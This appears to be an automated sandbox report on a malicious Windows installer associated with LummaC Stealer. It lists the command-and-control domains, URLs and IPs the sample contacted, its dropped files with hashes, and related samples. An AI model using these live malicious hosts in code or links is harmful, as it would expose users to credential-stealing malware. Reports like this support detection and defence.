Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
imbibelubmbe.click	104.21.42.198	true	true	unknown
klipvumisui.shop	172.67.208.58	true	false	high
lvtyqJYzLeYzcx.lvtyqJYzLeYzcx	unknown	unknown	false	unknown
dfgh.online	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://klipvumisui.shop/int_clp_sha.txt	false	Avira URL Cloud: malware	unknown
https://imbibelubmbe.click/api	true	Avira URL Cloud: safe	unknown
https://cegu.shop/8574262446/ph.txt	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000000.2472535335.0000000000FC1000.00000020.00000001.01000000.0000000B.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe.12.dr	false		high
http://repository.certum.pl/cscasha2.cer0	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.microsoft.0	powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.usertr	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=user-PCT	powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000011.00000002.2315065218.00000000033B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.autoitscript.com/autoit3/	Pens.com.1.dr	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000011.00000002.2317088393.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.remobjects.com/ps	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2476565736.00000000037BF000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2479943913.000000007EE5B000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000000.2489704382.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000000.2506368123.000000000069D000.00000020.00000001.01000000.0000000E.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	false		high
http://crt.sectigo.com/Sectig	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://subca.ocsp-certum.com01	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2476565736.00000000037BF000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe, 00000013.00000003.2479943913.000000007EE5B000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000000.2489704382.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000000.2506368123.000000000069D000.00000020.00000001.01000000.0000000E.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.22.dr, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp.19.dr	false		high
https://sectigo.com/CPS0D	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dfgh.online	powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://jrsoftware.org0	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
https://jrsoftware.org/	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compname=	powershell.exe, 00000011.00000002.2313277505.0000000002E90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autohotkey.comCould	BrightLib.exe, 00000032.00000002.2907992424.000000000049A000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000011.00000002.2317088393.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
https://...onlin	powershell.exe, 00000011.00000002.2322404249.0000000007704000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctnca.crl0k	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000011.00000002.2317088393.000000000540E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000011.00000002.2321223484.0000000006023000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Pens.com, 0000000C.00000000.1699393380.0000000000155000.00000002.00000001.01000000.00000008.sdmp, Pens.com.1.dr	false		high
http://www.autohotkey.com	BrightLib.exe, 00000032.00000002.2907992424.000000000049A000.00000002.00000001.01000000.00000010.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	installer_1.05_36.5.exe	false		high
https://www.certum.pl/CPS0	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.certum.pl/cscasha2.crl0q	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.usertru	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cscasha2.ocsp-certum.com04	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ms/Mi	powershell.exe, 00000011.00000002.2322740264.0000000007788000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=user-PC	powershell.exe, 00000011.00000002.2322634468.0000000007764000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2317088393.0000000005117000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2499582527.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000014.00000003.2492574526.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp, 00000017.00000002.2909977026.0000000002520000.00000004.00001000.00020000.00000000.sdmp	false		high
http://michaeluno.jp/	BrightLib.exe, 00000032.00000002.2908056353.0000000000AEE000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.42.198	imbibelubmbe.click	United States	13335	CLOUDFLARENETUS	true
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
172.67.208.58	klipvumisui.shop	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582048
Start date and time:	2024-12-29 17:54:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	installer_1.05_36.5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@83/36@5/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 48 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 8188 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
11:54:54	API Interceptor	1x Sleep call for process: installer_1.05_36.5.exe modified
11:54:59	API Interceptor	14x Sleep call for process: Pens.com modified
11:55:59	API Interceptor	8x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.161.251.21	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	@Setup.exe	Get hash	malicious	LummaC	Browse
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse
172.67.208.58	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC	Browse
	does virginia have a no chase law for motorcycles 62848.js	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	185.161.251.21
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	185.161.251.21
klipvumisui.shop	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128
	@Setup.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	EFT Payment_Transcript__Survitecgroup.html	Get hash	malicious	Unknown	Browse	104.18.26.193
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	Lets-x64.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	Whyet-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.190.234
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	172.64.150.63
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.80.1
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	rfWu0dUz6A.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
NTLGB	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	185.161.251.21
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	installer_1.05_36.4.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	@Setup.exe	Get hash	malicious	LummaC	Browse	185.161.251.21
	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	81.97.105.115
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	185.161.251.21
CLOUDFLARENETUS	EFT Payment_Transcript__Survitecgroup.html	Get hash	malicious	Unknown	Browse	104.18.26.193
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1
	Lets-x64.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	Whyet-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	104.21.81.224
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.190.234
	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	172.64.150.63
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.80.1
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	rfWu0dUz6A.exe	Get hash	malicious	LummaC	Browse	104.21.32.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	Winter.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	MdhO83N5Fm.exe	Get hash	malicious	LummaC	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	rfWu0dUz6A.exe	Get hash	malicious	LummaC	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	gdi32.dll	Get hash	malicious	LummaC	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	172.67.208.58 104.21.42.198 185.161.251.21
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse	172.67.208.58 104.21.42.198 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	BagsThroat.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: @Setup.exe, Detection: malicious, Browse Filename: !Set-up..exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse Filename: TNyOrM6mIM.exe, Detection: malicious, Browse Filename: j2nLC29vCy.exe, Detection: malicious, Browse Filename: es5qBEFupj.exe, Detection: malicious, Browse Filename: vUcZzNWkKc.exe, Detection: malicious, Browse Filename: CLaYpUL3zw.exe, Detection: malicious, Browse Filename: BagsThroat.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\a

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	471680
Entropy (8bit):	7.999629778538641
Encrypted:	true
SSDEEP:	12288:ibvRW88f2Xmd/HZdoStzZxBQM5K8rMdc20FtJZwJp:ibvRW2A3o6ZxFK8rWwFBwv
MD5:	F53F2B35E6D27192C269E9C4570FEEC7
SHA1:	CA7E624062DEE46D7754C939A06C2D58286F45E6
SHA-256:	D48656B1B8314B8F3A31B1E97374D2BD5CC889E0D5D72A79697978BE60C8C51B
SHA-512:	D5DA9D86B405D4F547CBF5D481FEE4490D3CCC4621D2D2F2DAC81F49DC6DC713A82685EF6483B9793BAED95617F95EC897F848D410D6D65CFA424B22E82A76D4
Malicious:	false
Preview:	+........8H.fcN@.J$...?...r...I...........I0...-........G.2.#..?.nZGj._qv.Z2.\|.nM.....'.......u...Ee.R..8......M.].<N.Fn.\+p....7I....yK.i(.......t.<:f..:"+.1....Z.....E.E8.6.2..... ...F..._..D.....B..!..\|G.~_'..w..j..H._./{...O.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....C.J.'.F...h..............Y..@^...Y..@^..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.$..,P..Myn.2..t.W.............../.Y..m9...Y..@^..m.....S.....5...x..2).U.j....R>..#.~.<.z..)...x....k.sI../.,...5......M..Ga&~9"..V..._...V`(......fd..g.....wz ....M.{.._..y..a.....@:s...=.....iV...h<...^O.z.U.PH?..K.%..OR.......Z=N...=..y.....*.'..#...frs..0...`@.e.g....u(.X.GH=+>...h..0.._h.....d..~1;....T.m0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Acids

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	136192
Entropy (8bit):	6.625191346824602
Encrypted:	false
SSDEEP:	3072:YEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLO:YEo3tb2j6AUkB0CThp6vmVnj6
MD5:	18520211C0EC3A274A2630333EB38F93
SHA1:	E82FF67DA9F81680720805F43C77E4B332A44367
SHA-256:	078EF7432E430D2199808EB2606214A9E4FCB343D0BF782E9D2E9582312F90F3
SHA-512:	6622C9FBBD84CEB0B0F362036874E4D590B7653A5DDF07CA5995ED69372A58A6536444D06CDB8521567F0136FD3F77531692059B933829866DA805C4B4BA4F33
Malicious:	false
